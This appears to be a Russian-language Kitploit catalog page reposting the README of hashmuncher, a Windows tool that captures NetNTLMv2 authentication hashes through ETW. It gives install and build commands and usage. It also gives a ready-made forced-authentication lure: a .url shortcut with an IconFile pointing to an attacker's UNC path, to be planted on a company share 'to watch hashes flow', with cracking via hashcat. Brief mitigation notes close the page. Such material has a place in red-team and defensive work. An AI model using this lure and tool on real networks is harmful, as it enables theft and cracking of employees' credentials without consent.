Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
hashmuncher — Получайте хеши NetNTLMv2 с помощью ETW при наличии прав администратора в Windows 8.1 / Windows Server 2016 и новее. | Kitploit
Инструменты/GitHubGitHub/lkarlslund/hashmuncher
Сниффинг и анализ пакетовАтаки на ПаролиАнализ хэшейСбор информацииТестирование на ПроникновениеRed Teaming
GitHublkarlslund/hashmuncher

hashmuncher

Получайте хеши NetNTLMv2 с помощью ETW при наличии прав администратора в Windows 8.1 / Windows Server 2016 и новее.

Репозиторий
126763 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Hash Muncher

Получайте хэши NetNTLMv2 с помощью ETW с правами администратора в Windows

GitHub all releases GitHub Workflow Status

  • Требует повышенных (администраторских) прав в Windows 8.1 / Windows 2016 или новее
  • Использует трассировку событий Windows (ETW) для доступа к необработанным данным пакетов SMB-аутентификации
  • Декодирует типы сообщений NTLM 2 и 3
  • Выводит результат в stdout или в файл
  • Нажмите Ctrl-C для остановки обработки или используйте опцию тайм-аута
  • Взламывайте хэши с помощью HashCat, используя -m 5600

Получение Hash Muncher

Есть три различных варианта для запуска и работы с инструментом

A) Скачайте автоматически собранные бинарные файлы из релизов

B) Соберите и установите в Windows с помощью этой команды Go

  • требуется Golang
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) Кроссплатформенно скомпилируйте Windows-бинарники на любой платформе, поддерживаемой Golang, с установленным PowerShell

  • требуется Golang и PowerShell
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

Использование

  1. Убедитесь, что брандмауэр Windows разрешает "Общий доступ к файлам и принтерам", поскольку Hash Muncher требует встроенную службу SMB для отправки и получения исходного запроса и отправки ответных пакетов целевому устройству.

  2. В командной строке с повышенными правами запустите Hash Muncher

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. Теперь ожидайте, пока кто-то пройдёт аутентификацию на вашей машине, или разместите URL-ярлык на популярном общем файловом ресурсе, как показано ниже.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

Замените IP-адрес на адрес вашей машины Hach Muncher и сохраните файл на (общедоступном в компании) файловом ресурсе как 'whatever.url', и наблюдайте, как хэши льются рекой.

Существуют и другие методы, упомянутые в Red Team Notes - Forced Authentication, и, вероятно, вы также сможете добиться успеха, разослав всем документ Word, но это совсем не скрытно.

Обнаружение

  • Я не видел ни одного, но пожалуйста, оставьте отзыв

Смягчение

  • Для части ETW мер нет; по словам Microsoft, это часть архитектуры Windows
  • Используйте СЛОЖНЫЕ пароли! Взлом NetNTLMv2 совсем не быстрый, но со слабыми паролями это вполне реально.
  • Отключите NTLM полностью! Возможно, это будет небезболезненно — но смотрите Прощай, NTLM — пора отключать NTLM

История

Я время от времени игрался с ETW, но как только увидел очень крутое исследование от Nettitude Labs, я понял, что обязан превратить это в простой в использовании инструмент на моём любимом языке — Golang! У Nettitude Labs есть рабочий POC, написанный на C# и работающий под .Net framework, и, возможно, он станет для вас лучшим вариантом. Так что я здесь ничего не изобретаю, просто предлагаю это как альтернативу.

Если вам нравится тематика безопасности Windows, вам также может понравиться мой инструмент для построения графов атак Adalanche

Скачать инструмент